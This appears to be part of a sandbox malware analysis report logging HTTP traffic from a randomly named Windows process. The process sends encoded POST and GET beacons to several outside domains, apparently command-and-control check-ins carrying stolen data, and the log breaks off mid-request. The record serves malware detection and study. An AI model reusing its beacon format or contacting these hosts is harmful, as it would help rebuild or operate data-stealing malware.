                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 35 75 4a 73 39 50 6d 30 6b 73 76 70 4f 50 47 58 77 57 49 49 44 2b 37 63 59 6e 37 76 49 51 54 77 35 6d 57 69 56 67 4e 4e 6f 36 4e 64 42 4b 52 61 58 4f 61 61 36 37 46 2f 67 4a 42 4d 79 7a 78 6e 63 48 69 56 49 75 5a 4d 53 45 67 6e 66 5a 56 34 70 30 35 30 6d 33 59 58 6c 6e 4b 45 50 58 2b 51 7a 4f 73 73 54 59 53 56 73 45 67 45 38 6b 6e 62 32 56 61 57 68 66 6d 75 62 36 47 5a 6e 7a 75 71 73 74 6f 6e 52 31 2b 31 72 6e 69 76 72 38 54 4b 4f 34 45 39 34 4b 64 32 38 67 58 41 79 33 57 50 78 67 2f 4c 33 56 4b 46 41 51 68 4c 6e 41 43 63 6a 64 44 4f 59 34 34 37 67 79 59 3d
                                                                                          Data Ascii: gHCXmDU=TPrAkU/pRz0b5uJs9Pm0ksvpOPGXwWIID+7cYn7vIQTw5mWiVgNNo6NdBKRaXOaa67F/gJBMyzxncHiVIuZMSEgnfZV4p050m3YXlnKEPX+QzOssTYSVsEgE8knb2VaWhfmub6GZnzuqstonR1+1rnivr8TKO4E94Kd28gXAy3WPxg/L3VKFAQhLnACcjdDOY447gyY=


                                                                                          Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 49734 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:46:00.042021990 CEST | Bytes transferred: 853 | Direction: OUT | Data: POST /kdfx/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.multileveltravel.world
                                                                                          Origin: http://www.multileveltravel.world
                                                                                          Referer: http://www.multileveltravel.world/kdfx/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 34 4e 52 73 77 4d 4f 30 73 73 75 62 43 76 47 58 2b 32 49 79 44 2b 33 63 59 6c 57 6f 49 6a 6e 77 36 45 4f 69 55 6b 52 4e 70 36 4e 64 4b 71 52 66 59 75 61 42 36 37 49 63 67 4c 46 4d 79 7a 31 6e 63 47 53 56 49 5a 4e 50 64 30 67 6c 4b 4a 56 70 74 30 35 30 6d 33 59 58 6c 6e 33 76 50 58 6d 51 7a 66 38 73 54 38 4f 53 6c 6b 67 48 71 30 6e 62 6e 6c 61 53 68 66 6d 41 62 2f 75 7a 6e 32 71 71 73 76 77 6e 52 6b 2b 71 6c 6e 69 74 32 4d 53 31 4f 4c 68 4c 78 72 56 6d 35 6a 71 48 7a 42 4b 79 30 57 53 68 74 33 43 74 54 77 4e 7a 33 54 4b 72 79 74 69 6e 43 62 6f 4c 2b 6c 50 52 50 68 67 69 52 30 44 48 61 30 6c 6e 39 6d 57 36 6b 6a 70 64
                                                                                          Data Ascii: gHCXmDU=TPrAkU/pRz0b4NRswMO0ssubCvGX+2IyD+3cYlWoIjnw6EOiUkRNp6NdKqRfYuaB67IcgLFMyz1ncGSVIZNPd0glKJVpt050m3YXln3vPXmQzf8sT8OSlkgHq0nbnlaShfmAb/uzn2qqsvwnRk+qlnit2MS1OLhLxrVm5jqHzBKy0WSht3CtTwNz3TKrytinCboL+lPRPhgiR0DHa0ln9mW6kjpd


                                                                                          Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 49735 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:46:02.604048967 CEST | Bytes transferred: 1870 | Direction: OUT | Data: POST /kdfx/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.multileveltravel.world
                                                                                          Origin: http://www.multileveltravel.world
                                                                                          Referer: http://www.multileveltravel.world/kdfx/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Data Ascii: gHCXmDU= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49736 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:46:05.251880884 CEST | 553 | OUT | GET /kdfx/?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.multileveltravel.world
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Sep 30, 2024 18:46:06.630744934 CEST | 404 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 30 Sep 2024 16:46:06 GMT
Content-Type: text/html
Content-Length: 264
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49737 | 199.192.21.169 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:46:12.244235992 CEST | 809 | OUT | POST /ghvt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.technectar.top
Origin: http://www.technectar.top
Referer: http://www.technectar.top/ghvt/
Content-Length: 208
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Data Ascii: gHCXmDU=GRLkTkXkttl+b/OwPF045petj5uWwbG14398uGvbiOuarKNuoBOp1wZDGV6T9qDTist0JXijAVuG5aExMG0Bh+JiA3srb4hMy4emwMpu56QyVlYmnZQg1CRag/q/iSso2FTD0eYAX9NKOjCWP2HQ7SRvqy5B33+Ta2RQlp/q4T/yn4arLL1yfxgbdwqjalJG17d/ZEg=
Sep 30, 2024 18:46:12.839900970 CEST | 980 | IN | HTTP/1.1 404 Not Found
Date: Mon, 30 Sep 2024 16:46:12 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 774
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49738 | 199.192.21.169 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:46:14.922312975 CEST | 829 | OUT | POST /ghvt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.technectar.top
Origin: http://www.technectar.top
Referer: http://www.technectar.top/ghvt/
Content-Length: 228
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Data Ascii: gHCXmDU=GRLkTkXkttl+KsWwIk04oZeqm5uW77G543h8uDXx3oeayq9uvwOpywZDN17b5qDUishKJSKjAV6G5b0xM1sCnuJgKnspf4hMy4emwM9E56IyV1omm4QvrSRZofq/mSss2FSQ0aYmX/FKOjSWPDnTxSRpgS4ShyWeVGkchPy751+Mvu3BRp9aMRMjNjiULVovvYNPHT13LP+XtX1HiceT8XpscOQI
Sep 30, 2024 18:46:15.509844065 CEST | 980 | IN | HTTP/1.1 404 Not Found
Date: Mon, 30 Sep 2024 16:46:15 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 774
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49739 | 199.192.21.169 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:46:17.465114117 CEST | 1846 | OUT | POST /ghvt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.technectar.top
Origin: http://www.technectar.top
Referer: http://www.technectar.top/ghvt/
Content-Length: 1244
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Data Ascii: gHCXmDU=GRLkTkXkttl+KsWwIk04oZeqm5uW77G543h8uDXx3r+auLduoj2pzwZDRl7a5qDFis5WJSGdAWCGrp8xHksCpuJgE3sob4hVy8yqwMtE56IyV2wmipQvpSRag/qziSsE2FLl0aM2XulKOHOWcAPT9SRrnS5VhyTeVGJthPvs5yyM+v2tEKlnVio5BC6YRxwoqZ1vPCEQE/u76HR6koGfni1nSax8g7m9M5xi+bCMBd/LyMr/ZolGrn0uBIVDnz9cx6E0x7UiGgTPo3QhQx4GBNWChwMHzchuoc8qZB9ierQKK9JOjY86dcar5wuT+p9XUeWTHEJxolR5bFQyWqWjutxA7LlVDdcsIMhb7XvJhRgsn21UBqtHYo8mYVoPoL6Zq4W8ZWthlkgg70K+NcnvYlUYbnnfOCW0sPAlq2TfALeeyacAa9H0yjmUuNSMpl5+MBy951MM72PwzpwwdHJZyhQxv9ThLLmelm6EJjWrKP44tnFAqf2ZThMMJLAhKoXbHdln6Vn/d3JYgKG/IoP8ryvXdCiRGqu74qrVIr63jt68/YFqfLThOr7M/ojIgw1Cu1WiB26ClRJ1NQomHnhXx0IPYJkYgRgmxOtkDSx3iF3cJtB47NV5iMm7JlJ9P/lIX4k9q80WqEdKQzk4gFcmwrzO9a6fNIwDeco/kP46fe1E4OobUPJPzzIxSPXTm1V7dilB+V4KlPqtAD/QeVzOEHSeMLMInTuumwKtdYFv3gwxH7LuMN+y1mriBpv9scmpfJwatdBfg1KXaDQ6gOaqqos6pmQMR05e8N+1W1SrxITWRuGQk6GPkNfadkSy42gkiXVXSTMGALTRQaX+Ot+mEIABWU7NChV3wsNEk8LzfOOKrB/iTdHalGsS9bUpm5UsG35v5bYy46uGqs+MiDC4EH/PGN1nSpFoCaDUb4SxPRyercVmnzUMg6HZ3yYDiVSILKX4o/zUy0/QZH6vCQsIi79OKGI7ZAxskGk0jZ6ODoPI [TRUNCATED]
Sep 30, 2024 18:46:18.148269892 CEST | 980 | IN | HTTP/1.1 404 Not Found
Date: Mon, 30 Sep 2024 16:46:17 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 774
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49740 | 199.192.21.169 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:46:20.004842043 CEST | 545 | OUT | GET /ghvt/?gHCXmDU=LTjEQRzJtYpWLPC7D2gy6fienZfrxvC35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4hrVkAG0NSKhN96qT0ct2vaZlIyhDhNk8pUo7hoK/rit8rQ==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.technectar.top
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Sep 30, 2024 18:46:20.598527908 CEST | 995 | IN | HTTP/1.1 404 Not Found
Date: Mon, 30 Sep 2024 16:46:20 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 774
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49741 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:46:25.713385105 CEST | 809 | OUT | POST /l8vr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.linkwave.cloud
Origin: http://www.linkwave.cloud
Referer: http://www.linkwave.cloud/l8vr/
Content-Length: 208
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Ascii: gHCXmDU=LWY65CcvY07FWIVRT8TGJFBuqr4EJ8x/5BKOaY9CpobSw9FkPDfBNKsZBm0HzFtNuXf6MFFDuKAKAosLEKWMXsCTGQ09iMHPNS7Y+hkfpBPutSGviGwOSV2iFQyafkr07wqeqBmGcDbhUYeLput31stSr4ynad7jc7cgEnc4MJmzwQmcDkd48GQK38+6wtQmcTGUdgE=


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          30         | 192.168.2.5 | 49742       | 3.33.130.190   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:28.368000984 CEST | 829               | OUT       | POST /l8vr/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.linkwave.cloud
                                                                                          Origin: http://www.linkwave.cloud
                                                                                          Referer: http://www.linkwave.cloud/l8vr/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 6f 6c 52 66 2f 4c 47 42 46 42 70 32 37 34 45 47 63 78 37 35 42 47 4f 61 5a 34 50 70 65 4c 53 31 6f 35 6b 64 79 66 42 4d 4b 73 5a 4a 47 30 43 33 46 74 38 75 58 62 79 4d 48 52 44 75 4f 67 4b 41 71 30 4c 45 39 4b 4e 57 38 43 52 66 41 30 2f 2f 63 48 50 4e 53 37 59 2b 68 78 43 70 46 72 75 74 47 43 76 67 6a 51 52 62 31 32 68 45 51 79 61 62 6b 72 6f 37 77 71 38 71 44 53 6f 63 41 6a 68 55 64 69 4c 70 2f 74 6f 37 73 74 55 31 34 7a 77 53 66 57 71 61 74 45 69 44 58 64 4d 58 59 6d 77 78 6d 4c 32 5a 47 56 51 76 6d 38 79 6e 76 32 4e 68 64 78 50 47 77 57 6b 44 33 51 65 66 64 47 64 75 4d 67 36 4e 44 47 66 32 52 64 32 6d 2b 57 6a
                                                                                          Data Ascii: gHCXmDU=LWY65CcvY07FWolRf/LGBFBp274EGcx75BGOaZ4PpeLS1o5kdyfBMKsZJG0C3Ft8uXbyMHRDuOgKAq0LE9KNW8CRfA0//cHPNS7Y+hxCpFrutGCvgjQRb12hEQyabkro7wq8qDSocAjhUdiLp/to7stU14zwSfWqatEiDXdMXYmwxmL2ZGVQvm8ynv2NhdxPGwWkD3QefdGduMg6NDGf2Rd2m+Wj


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          31         | 192.168.2.5 | 49743       | 3.33.130.190   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:31.459141970 CEST | 1846              | OUT       | POST /l8vr/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.linkwave.cloud
                                                                                          Origin: http://www.linkwave.cloud
                                                                                          Referer: http://www.linkwave.cloud/l8vr/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4c 57 59 36 35 43 63 76 59 30 37 46 57 6f 6c 52 66 2f 4c 47 42 46 42 70 32 37 34 45 47 63 78 37 35 42 47 4f 61 5a 34 50 70 65 44 53 70 4b 68 6b 50 68 48 42 50 4b 73 5a 56 57 30 44 33 46 74 62 75 57 2f 2b 4d 48 63 34 75 49 73 4b 47 2f 67 4c 4e 6f 2b 4e 63 38 43 52 51 67 30 2b 69 4d 47 46 4e 53 72 63 2b 68 68 43 70 46 72 75 74 41 75 76 70 57 77 52 64 31 32 69 46 51 79 73 66 6b 72 4d 37 77 79 47 71 44 57 57 64 78 44 68 56 35 2b 4c 76 4e 46 6f 6b 38 74 57 68 59 7a 34 53 66 61 70 61 70 73 49 44 55 42 69 58 66 53 77 78 6e 32 51 4d 48 74 6d 38 46 55 77 71 76 36 61 2f 59 41 74 46 6d 72 56 4a 67 30 51 63 75 32 6f 6e 34 5a 69 4c 69 58 74 31 33 6c 64 75 62 33 52 69 4d 71 51 75 4d 77 2b 6f 4c 4c 4d 31 51 48 68 59 31 2b 32 54 69 57 64 57 49 76 62 34 53 67 70 6c 6f 6a 2f 43 61 72 72 75 7a 4c 67 4a 74 78 64 34 77 70 4d 66 61 64 66 37 77 6f 42 53 42 6b 42 47 48 6a 50 69 48 58 31 47 37 36 64 4b 41 6f 49 47 51 70 78 57 59 4f 64 45 52 63 73 35 44 73 6f 31 4f 73 45 33 31 52 4a 54 39 30 54 6b 73 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=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 [TRUNCATED]


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          32         | 192.168.2.5 | 49744       | 3.33.130.190   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:34.023124933 CEST | 545               | OUT       | GET /l8vr/?gHCXmDU=GUwa608LSzm8fYtcdeTRGyNyj51nBuUp00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlXIaPeRkD7t3kPxbZ1SpX5GCbw23hlnYlJ0j4JxqETFq6pw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.linkwave.cloud
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:46:34.481323957 CEST | 404               | IN        | HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:46:34 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 47 55 77 61 36 30 38 4c 53 7a 6d 38 66 59 74 63 64 65 54 52 47 79 4e 79 6a 35 31 6e 42 75 55 70 30 30 75 6d 62 59 52 43 6d 2f 54 4a 6a 4a 78 70 53 54 44 4d 4f 4e 6b 71 4e 6d 73 48 6a 6e 5a 6a 6b 58 4b 71 46 6e 63 6a 71 4a 49 75 65 71 4d 76 46 61 76 6c 58 49 61 50 65 52 6b 44 37 74 33 6b 50 78 62 5a 31 53 70 58 35 47 43 62 77 32 33 68 6c 6e 59 6c 4a 30 6a 34 4a 78 71 45 54 46 71 36 70 77 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=GUwa608LSzm8fYtcdeTRGyNyj51nBuUp00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlXIaPeRkD7t3kPxbZ1SpX5GCbw23hlnYlJ0j4JxqETFq6pw==&Gh9=g8u8"}</script></head></html>


                                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                          33         | 192.168.2.5 | 49745       | 188.114.96.3   | 80               | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp                            | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:46:39.529092073 CEST | 821               | OUT       | POST /5hcm/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bayarcepat19.click
                                                                                          Origin: http://www.bayarcepat19.click
                                                                                          Referer: http://www.bayarcepat19.click/5hcm/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
